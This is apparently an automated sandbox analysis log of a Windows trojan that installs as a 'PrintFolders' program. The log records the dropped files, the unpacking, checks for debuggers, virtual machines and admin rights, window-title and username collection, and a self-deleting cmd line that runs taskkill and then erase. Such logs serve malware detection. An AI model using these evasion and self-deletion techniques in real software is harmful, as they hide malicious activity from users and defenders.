                Source: is-I19BM.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-I19BM.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-I19BM.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-K96P8.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-K96P8.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-K96P8.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-RBTTG.tmp.1.drStatic PE information: No import functions for PE file found
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exe, 00000000.00000000.305692501.0000000000410000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename" vs file.exe
                Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilename" vs file.exe
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
                Source: ntFolders.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe"
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe"
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70,
                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ntFolders.exe")
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmpJump to behavior
                Source: classification engineClassification label: mal96.troj.evad.winEXE@12/23@0/5
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00454498 GetModuleHandleA,6D705550,GetDiskFreeSpaceA,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4212:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040B1E0 FindResourceA,FreeResource,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Program Files (x86)\PrintFoldersJump to behavior
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCommand line argument: `a}{
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCommand line argument: MFE.
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCommand line argument: ZK]Z
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCommand line argument: ZK]Z
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 2460138 > 1048576
                Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-RBTTG.tmp.1.dr

                Data Obfuscation

                barindex
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeUnpacked PE file: 2.2.ntFolders.exe.400000.0.unpack
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeUnpacked PE file: 2.2.ntFolders.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.aud104:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406584 push 004065C1h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404159 push eax; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404229 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042AA push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408B24 push 00408B57h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404327 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040438C push 00404435h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00409B70 push 00409BADh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040A257 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00478210 push 004782BBh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040A22B push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00412B40 push 00412BA3h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00450FF8 push 0045102Bh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004055BD push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040568D push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040570E push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004057F0 push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040578B push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_004311AD push esi; ret
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0040F4BB push ecx; ret
                Source: ntFolders.exe.1.drStatic PE information: section name: .aud104
                Source: initial sampleStatic PE information: section name: .text entropy: 7.372860732455768
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Program Files (x86)\PrintFolders\is-K96P8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpFile created: C:\Program Files (x86)\PrintFolders\ntFolders.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004243AC IsIconic,SetActiveWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004177B0 IsIconic,GetCapture,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00417EE6 IsIconic,SetWindowPos,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpDropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpDropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpDropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpDropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-K96P8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004095D0 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00451554 FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp, ntFolders.exe, 00000002.00000002.394139951.000000000187A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0040F789 SetUnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004593E4 GetVersion,GetModuleHandleA,6D705550,6D705550,6D705550,AllocateAndInitializeSid,LocalFree,
                Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program managerv
                Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: GetLocaleInfoA,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetLocaleInfoW,
